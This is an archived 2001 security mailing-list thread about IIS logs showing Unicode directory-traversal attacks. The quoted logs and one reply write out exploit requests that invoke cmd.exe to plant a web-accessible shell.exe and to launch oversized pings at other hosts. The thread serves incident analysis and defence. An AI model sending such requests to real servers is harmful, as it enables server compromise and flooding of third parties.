Re: Unicode Logs with Ping Activity

From: Blake Frantz (blakeat_private)
Date: Tue Jul 10 2001 - 10:39:20 PDT

  • Next message: SirPsychoSexy: "Worm or rootkit..."

    I've found that if the '-n' argument is set extremely high in the
    ping command W3SVC adds a line to Event Viewer stating that the 
    script had timed out.
    
    For example, the following request:
    /scripts/..%5c..%5cwinnt/system32/cmd.exe?+/c+ping+-n+120000+-l+65411+-w+130+-v+107+123.123.123.123
    
    
    would generate an event such as the this:
    
    The script started from the URL
    '/scripts/..%5c..%5cwinnt/system32/cmd.exe' with parameters
    '/c+ping+-n+120000+-l+65411+-w+130+-v+107+123.123.123.123' has not
    responded within the configured timeout period.  The HTTP server is
    terminating the script. 
    
    Blake
    
    ================================================================= 
    The Government, like diapers, should be replaced regularly, and
    often for the same reasons. 
    
    On Tue, 10 Jul 2001, Jordan K Wiens wrote:
    
    > No, a 502 error is a bad gateway error; what happens is that your iis
    > server is unpatched against the unicde exploits (one of them, at least) and
    > is executing the command to ping a host.  Just recently there seems to be
    > an increase in the number of hackers using vulnerable web servers for ddos
    > like behavior using over-sized pings.
    > 
    > When the ping command executes, it runs the pings, however, it (obviously)
    > does not return complete html headers as its output (since ping was never
    > meant to run via the web, its not supposed to run like a normal web
    > executable). IIS notices this, and realizes that the script hasn't
    > correctly executed, and lets you know with the 502 error.  If you actually
    > look at the page, the results would read something like: "502 error; the
    > application has not returned correct headers.  The headers it did return
    > are:" and then IIS would procede to show the output of whatever had been
    > shown.
    > 
    > The error you want to see once a machine has been fully patched is usually
    > a 404 error.
    > 
    > -- 
    > Jordan Wiens
    > UF Network Incident Response Team
    > (352)392-2061
    > 
    > On Tue, 10 Jul 2001 myrddin_eat_private wrote:
    > 
    > > Would like someone to help me understand what is going on here... The 502 
    > > error at the end end of these entries would indcicate failures, wouldn't 
    > > they? I've been all through the logs on this box, and even thought at every 
    > > attempt to copy c:\winnt\system32\cmd.exe to c:\inetpub\scripts\shell.exe 
    > > shows a 502, it is there.
    > > 
    > > I'm looking at the times on the log entries and guessing that this was a 
    > > manual attack.
    > > 
    > > Also, can someone please explain what is being attempted with these pings?
    > > aaa.aaa.aaa.aaa
    > > bbb.bbb.bbb.bbb
    > > ccc.ccc.ccc.ccc.ccc
    > > ddd.ddd.ddd.ddd.ddd 
    > > are all unique addresses.
    > > 
    > > #Software: Microsoft Internet Information Services 5.0
    > > #Version: 1.0
    > > #Date: 2001-06-19 18:44:15
    > > #Fields: date time c-ip cs-username s-ip s-port cs-method cs-uri-stem cs-
    > > uri-query sc-status cs(User-Agent) 
    > > 2001-06-19 18:44:15 aaa.aaa.aaa.aaa - bbb.bbb.bbb.bbb 80 GET /scripts/../../winnt/system32/cmd.exe 
    > > /c+copy+c:\winnt\system32\cmd.exe+c:\inetpub\scripts\shell.exe 502 -
    > > 2001-06-19 19:24:28 aaa.aaa.aaa.aaa - bbb.bbb.bbb.bbb 80 GET /scripts/../../winnt/system32/cmd.exe 
    > > /c+ping+-v+ip-header-bad%20-n+300+-l+65500+-w+0+ccc.ccc.ccc.ccc 502 -
    > > 2001-06-19 19:31:42 aaa.aaa.aaa.aaa - bbb.bbb.bbb.bbb 80 GET /scripts/../../winnt/system32/cmd.exe 
    > > /c+ping+-v+host-precedence-violation%20-n+300+-l+65500+-w+0+ddd.ddd.ddd.ddd 
    > > 502 -
    > > Free, encrypted, secure Web-based email at www.hushmail.com
    > > 
    > 
    
    
    
    ----------------------------------------------------------------------------
    
    
    This list is provided by the SecurityFocus ARIS analyzer service.
    For more information on this free incident handling, management 
    and tracking system please see:
    
    http://aris.securityfocus.com
    



    This archive was generated by hypermail 2b30 : Wed Jul 11 2001 - 13:26:55 PDT